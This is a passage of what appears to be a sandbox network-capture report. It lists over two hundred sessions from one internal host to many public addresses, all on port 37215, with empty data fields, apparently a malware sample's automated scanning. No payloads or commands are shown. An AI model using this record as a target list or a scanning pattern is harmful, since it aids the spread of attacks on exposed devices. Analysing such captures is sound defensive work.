                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6305192.168.2.2347202197.81.252.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6306192.168.2.2354054157.164.169.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6307192.168.2.2353880197.108.86.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6308192.168.2.2341612157.161.72.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6309192.168.2.234576841.255.15.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6310192.168.2.2349258197.10.54.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6311192.168.2.233411041.94.252.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6312192.168.2.2349310160.122.195.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6313192.168.2.234789241.95.72.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6314192.168.2.2356000157.49.176.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6315192.168.2.233480093.71.5.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6316192.168.2.2347836206.205.26.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6317192.168.2.2353986156.95.76.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6318192.168.2.2336362197.173.179.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6319192.168.2.233371241.78.107.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6320192.168.2.2348922140.40.61.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6321192.168.2.235558641.244.192.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6322192.168.2.235542472.24.246.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6323192.168.2.2360888157.85.236.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6324192.168.2.2352186101.242.169.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6325192.168.2.234405275.36.130.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6326192.168.2.2333762157.187.159.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6327192.168.2.235861041.70.193.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6328192.168.2.233315041.79.129.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6329192.168.2.2345228157.234.208.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6330192.168.2.2334354104.185.85.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6331192.168.2.234809241.253.107.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6332192.168.2.23594484.191.4.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6333192.168.2.2343222199.247.228.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6334192.168.2.235027681.37.177.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6335192.168.2.234694241.156.139.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6336192.168.2.23356868.148.194.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6337192.168.2.2351692197.179.78.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6338192.168.2.2355086197.113.175.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6339192.168.2.235377041.195.46.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6340192.168.2.234154841.203.77.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6341192.168.2.2356254157.173.203.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6342192.168.2.233328032.40.241.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6343192.168.2.2340908197.112.106.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6344192.168.2.2336358197.98.105.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6345192.168.2.233392441.84.118.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6346192.168.2.2357596197.130.25.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6347192.168.2.23334809.51.230.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6348192.168.2.234676641.50.142.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6349192.168.2.2347566157.172.56.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6350192.168.2.2335360157.131.61.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6351192.168.2.234076841.53.153.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6352192.168.2.233347241.111.214.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6353192.168.2.2358620157.252.78.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6354192.168.2.2337390197.87.148.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6355192.168.2.2346984157.88.163.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6356192.168.2.234383471.210.35.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6357192.168.2.2344536157.166.133.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6358192.168.2.233785252.146.160.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6359192.168.2.2360422197.143.195.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6360192.168.2.2351008126.1.87.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6361192.168.2.233879841.134.134.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6362192.168.2.2334314197.185.139.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6363192.168.2.2353818154.76.117.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6364192.168.2.2349508197.46.83.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6365192.168.2.233392461.179.239.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6366192.168.2.2336918197.81.210.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6367192.168.2.2347868157.178.231.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6368192.168.2.2333150157.216.146.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6369192.168.2.235973041.140.116.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6370192.168.2.2342490197.130.2.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6371192.168.2.233344657.128.133.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6372192.168.2.233916041.134.14.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6373192.168.2.2343676161.99.24.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6374192.168.2.2348128197.124.64.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6375192.168.2.235879232.75.92.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6376192.168.2.2337366157.42.36.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6377192.168.2.235464241.115.221.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6378192.168.2.235872269.170.49.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6379192.168.2.234932649.29.197.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6380192.168.2.235783041.165.155.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6381192.168.2.235178031.192.148.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6382192.168.2.23599189.167.108.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6383192.168.2.2343656157.168.239.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6384192.168.2.2352878197.237.155.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6385192.168.2.2360770119.167.199.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6386192.168.2.233648241.121.50.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6387192.168.2.2336918172.122.36.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6388192.168.2.2352366201.231.200.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6389192.168.2.2353738157.210.156.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6390192.168.2.2343256157.78.217.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6391192.168.2.2355152157.155.238.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6392192.168.2.234394825.181.45.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6393192.168.2.235971641.26.164.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6394192.168.2.2340434164.23.217.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6395192.168.2.2360658197.112.225.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6396192.168.2.234613441.200.100.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6397192.168.2.2353508157.166.65.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6398192.168.2.2348962157.251.17.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6399192.168.2.2348148157.225.134.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6400192.168.2.2345786197.247.111.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6401192.168.2.2346850157.143.202.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6402192.168.2.2352440157.243.49.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6403192.168.2.2343232197.10.37.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6404192.168.2.2335512211.17.135.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6405192.168.2.2359582157.213.215.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6406192.168.2.2333252197.196.74.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6407192.168.2.2354612208.209.36.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6408192.168.2.234820465.142.25.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6409192.168.2.234405054.229.81.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6410192.168.2.2345276197.253.102.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6411192.168.2.2340642197.41.161.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6412192.168.2.235797041.109.187.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6413192.168.2.2342762197.52.159.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6414192.168.2.2338082197.175.69.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6415192.168.2.2348548197.4.245.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6416192.168.2.2338520197.36.146.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6417192.168.2.2349054119.215.221.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6418192.168.2.234024296.114.64.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6419192.168.2.2357982197.192.65.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6420192.168.2.2355400197.251.200.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6421192.168.2.2340744164.2.253.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6422192.168.2.234885641.84.195.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6423192.168.2.235691441.130.119.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6424192.168.2.2353766197.15.171.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6425192.168.2.234531649.87.152.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6426192.168.2.2344560157.204.169.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6427192.168.2.2352280197.114.109.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6428192.168.2.233643641.213.169.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6429192.168.2.2346750197.44.177.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6430192.168.2.234882441.140.149.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6431192.168.2.235781441.234.65.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6432192.168.2.2351496197.239.25.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6433192.168.2.2332850157.184.148.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6434192.168.2.2353800197.171.3.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6435192.168.2.2351470197.236.91.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6436192.168.2.2359722146.91.79.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6437192.168.2.233383241.189.168.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6438192.168.2.235498888.151.95.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6439192.168.2.2341058157.167.205.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6440192.168.2.234791217.131.250.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6441192.168.2.2345052100.47.111.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6442192.168.2.2347640157.74.49.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6443192.168.2.2345722186.196.209.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6444192.168.2.2340698197.42.227.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6445192.168.2.234979039.31.108.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6446192.168.2.2346012197.173.86.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6447192.168.2.2341818197.112.177.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6448192.168.2.2345790157.3.117.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6449192.168.2.2340028157.222.17.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6450192.168.2.2341566145.14.100.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6451192.168.2.2339766157.76.153.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6452192.168.2.2341214211.5.92.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6453192.168.2.2352076197.65.84.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6454192.168.2.233858841.59.42.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6455192.168.2.233482241.131.106.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6456192.168.2.236091288.201.67.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6457192.168.2.2333964197.57.3.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6458192.168.2.2357484197.38.226.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6459192.168.2.2338504202.70.152.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6460192.168.2.2356552197.153.242.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6461192.168.2.2334642157.91.178.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6462192.168.2.233941296.230.230.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6463192.168.2.235839641.243.47.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6464192.168.2.2336798157.225.35.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6465192.168.2.2346344197.177.119.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6466192.168.2.2343706157.171.154.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6467192.168.2.2352470157.135.7.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6468192.168.2.2346084197.146.174.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6469192.168.2.2339328197.240.144.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6470192.168.2.236077041.247.74.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6471192.168.2.2353470197.242.178.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6472192.168.2.2335788138.79.73.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6473192.168.2.233841041.207.42.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6474192.168.2.235768441.53.61.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6475192.168.2.234772841.151.123.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6476192.168.2.2343456197.155.245.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6477192.168.2.236001041.254.65.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6478192.168.2.235562441.205.22.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6479192.168.2.235067441.16.22.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6480192.168.2.2337158197.57.135.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6481192.168.2.2356028199.60.100.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6482192.168.2.233969641.227.251.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6483192.168.2.2342722209.25.139.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6484192.168.2.2348852157.137.52.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6485192.168.2.235785041.206.118.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6486192.168.2.233697619.158.212.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6487192.168.2.233804841.62.100.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6488192.168.2.2358350181.15.173.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6489192.168.2.2337558197.131.102.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6490192.168.2.2336706157.173.235.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6491192.168.2.2337490166.8.137.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6492192.168.2.2360202157.206.217.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6493192.168.2.235773041.63.251.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6494192.168.2.2346256122.192.43.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6495192.168.2.2335934157.35.92.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6496192.168.2.2352306197.99.198.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6497192.168.2.2345746197.38.172.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6498192.168.2.2342844133.16.113.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6499192.168.2.2353818108.83.48.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6500192.168.2.2350928157.73.254.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6501192.168.2.2338826125.160.179.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6502192.168.2.234516041.133.221.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6503192.168.2.2353324197.71.222.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6504192.168.2.2359700197.130.52.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6505192.168.2.233841485.104.27.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6506192.168.2.2357898177.7.26.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6507192.168.2.233941841.158.6.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6508192.168.2.2342388157.127.42.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6509192.168.2.233458482.207.244.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6510192.168.2.234251641.14.15.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6511192.168.2.234584441.113.241.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6512192.168.2.2357236197.30.154.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6513192.168.2.234207641.228.254.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6514192.168.2.2347886157.87.95.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6515192.168.2.2343736146.36.53.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6516192.168.2.233769441.247.0.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6517192.168.2.2358490197.87.1.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6518192.168.2.2335730157.70.187.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6519192.168.2.235404441.173.178.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6520192.168.2.2358410197.82.52.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6521192.168.2.2345102182.0.68.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6522192.168.2.2349028197.55.48.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
